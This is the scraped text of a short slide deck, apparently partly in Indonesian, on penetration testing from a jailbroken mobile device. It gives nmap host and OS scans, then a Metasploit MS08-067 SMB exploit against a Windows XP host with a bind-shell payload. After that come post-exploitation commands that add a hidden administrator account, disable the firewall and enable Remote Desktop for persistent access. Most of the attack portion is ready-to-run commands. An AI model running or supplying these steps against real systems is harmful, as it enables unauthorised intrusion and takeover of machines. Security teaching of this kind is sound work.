Upload
chephz-dj
View
403
Download
1
Tags:
Embed Size (px)
Citation preview
http://www.flickr.com/photos/32615508@N02/3047982712
{network security part 1}Penetration test sederhana dengan mobile device...
{network scan}Host discovery, find the targets
StumblerPlus , iWep PRO
iNet , Snap: Mobile version of pinger/scanner (ex: Angry IP Scanner)
{deeper profiling}Port scanning, OS detection etc.
Nmap 5.00Jailbroken iPhone etc.
$> nmap -O 192.168.5.44
Aha, microsoft-ds (port 445)plus XP SP2...
Or else...
$> nmap -p 445 192.168.5.0/24
{penetrations}Using exploits etc.
Metasploit Framework
$> msfconsole
Easy, many modules, reular updates, Ruby, can run nmap too.
Use Proper Modules
$> use windows/smb/ms08_067_netapi$> show options$> show payloads
Security knowledge & deduction
Set Options
$> set payload windows/shell_bind_tcp$> set rhost 192.168.5.44$> exploit
Welcome to C: Prompt
$> ipconfig$> dir$> net user$> net user guestboss guestboss /add$> net localgroup Administrators /add guestboss$> echo “P4wned!” > "c:\Documents and Settings\guestboss\Desktop\Hello.txt"
Shutdown Firewalll & Enable RDP
$> set opmode mode = DISABLE exceptions = ENABLE
$> reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
$> net localgroup "Remote Desktop Users" /add guestboss
{conclusions?}..............................
Q & A